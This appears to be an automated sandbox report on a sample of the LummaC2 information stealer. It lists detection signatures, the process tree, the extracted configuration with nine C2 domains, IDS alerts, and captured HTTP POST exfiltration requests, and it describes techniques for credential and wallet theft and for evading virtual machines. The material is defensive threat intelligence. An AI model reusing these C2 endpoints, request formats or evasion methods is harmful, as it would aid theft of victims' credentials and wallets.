Edit tour

Windows Analysis Report
Delta.exe

Overview

General Information

Sample name:	Delta.exe
Analysis ID:	1582864
MD5:	24a858ebb9fc24d58bb3615386ce0f43
SHA1:	eaf287a3846ac77a908d4ec4468a49fedc207963
SHA256:	ddd1e3c7b4d8a8670e7c6d9a3bbd7e30d1c5658ed38e41a20efdee201b5239f7
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect virtual machines (STR)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Delta.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\Delta.exe" MD5: 24A858EBB9FC24D58BB3615386CE0F43)

conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Delta.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\Delta.exe" MD5: 24A858EBB9FC24D58BB3615386CE0F43)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["fancywaxxers.shop", "abruptyopsn.shop", "wholersorie.shop", "cloudewahsj.shop", "tirepublicerj.shop", "noisycuttej.shop", "framekgirus.shop", "rabidcowse.shop", "nearycrepso.shop"], "Build id": "yau6Na--914510980"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: Delta.exe PID: 7396	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Delta.exe PID: 7396	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Delta.exe PID: 7396	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Delta.exe PID: 7396	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:21:14.939261+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	104.21.96.1	443	TCP
2024-12-31T17:21:15.933780+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	104.21.96.1	443	TCP
2024-12-31T17:21:17.121915+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.96.1	443	TCP
2024-12-31T17:21:18.350782+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	104.21.96.1	443	TCP
2024-12-31T17:21:19.635018+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.96.1	443	TCP
2024-12-31T17:21:21.084859+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	104.21.96.1	443	TCP
2024-12-31T17:21:22.466515+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	104.21.96.1	443	TCP
2024-12-31T17:21:24.584267+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:21:15.444803+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	104.21.96.1	443	TCP
2024-12-31T17:21:16.398944+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	104.21.96.1	443	TCP
2024-12-31T17:21:25.028327+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49737	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:21:15.444803+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:21:16.398944+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49731	104.21.96.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:21:14.939261+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49730	104.21.96.1	443	TCP
2024-12-31T17:21:15.933780+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49731	104.21.96.1	443	TCP
2024-12-31T17:21:17.121915+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49732	104.21.96.1	443	TCP
2024-12-31T17:21:18.350782+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49733	104.21.96.1	443	TCP
2024-12-31T17:21:19.635018+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49734	104.21.96.1	443	TCP
2024-12-31T17:21:21.084859+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49735	104.21.96.1	443	TCP
2024-12-31T17:21:22.466515+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49736	104.21.96.1	443	TCP
2024-12-31T17:21:24.584267+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49737	104.21.96.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:21:14.445250+0100	2058656	1	Domain Observed Used for C2 Detected	192.168.2.4	59757	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:21:17.787374+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49732	104.21.96.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://fancywaxxers.shop/apig	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/apiS	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/w	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/oft.coc	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/ll	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/api3	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/5	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/micros	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/C	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/k	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop:443/apiUserUserUser	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/api:	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/3	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["fancywaxxers.shop", "abruptyopsn.shop", "wholersorie.shop", "cloudewahsj.shop", "tirepublicerj.shop", "noisycuttej.shop", "framekgirus.shop", "rabidcowse.shop", "nearycrepso.shop"], "Build id": "yau6Na--914510980"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 83.7% probability

Machine Learning detection for sample

Source: Delta.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String decryptor: fancywaxxers.shop
Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String decryptor: yau6Na--914510980

Source: Delta.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49737 version: TLS 1.2

Source: C:\Users\user\Desktop\Delta.exe	Code function: 0_2_005FB6E8 FindFirstFileExW,		0_2_005FB6E8
Source: C:\Users\user\Desktop\Delta.exe	Code function: 0_2_005FB799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_005FB799

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.4:59757 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49732 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49737 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49735 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49736 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49731 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49730 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49733 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49734 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.96.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: fancywaxxers.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop

Source: Joe Sandbox View

IP Address: 104.21.96.1 104.21.96.1

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.96.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y1RVV8N9OI1NTOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18143Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NF7LH923VBKDH6VCEBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8788Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VRRPKLD6B8VDDDLB5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20435Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NOJU2OM03User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1210Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G2X9029E03VFYHYSCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 549515Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: fancywaxxers.shop

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: fancywaxxers.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop

Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Delta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coc
Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Delta.exe, 00000002.00000003.1741709649.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Delta.exe, 00000002.00000003.1741709649.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Delta.exe, 00000002.00000003.1768871713.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1775221724.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791271518.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/
Source: Delta.exe, 00000002.00000003.1768871713.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/3
Source: Delta.exe, 00000002.00000003.1715106339.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/5
Source: Delta.exe, 00000002.00000003.2328378650.0000000002C82000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943650597.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328560798.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328409776.0000000002C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/C
Source: Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328409776.0000000002C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/api
Source: Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1756296005.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/api3
Source: Delta.exe, 00000002.00000002.2943602856.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328378650.0000000002C82000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328409776.0000000002C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/api:
Source: Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1756296005.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1768823100.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1755336348.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apiS
Source: Delta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apig
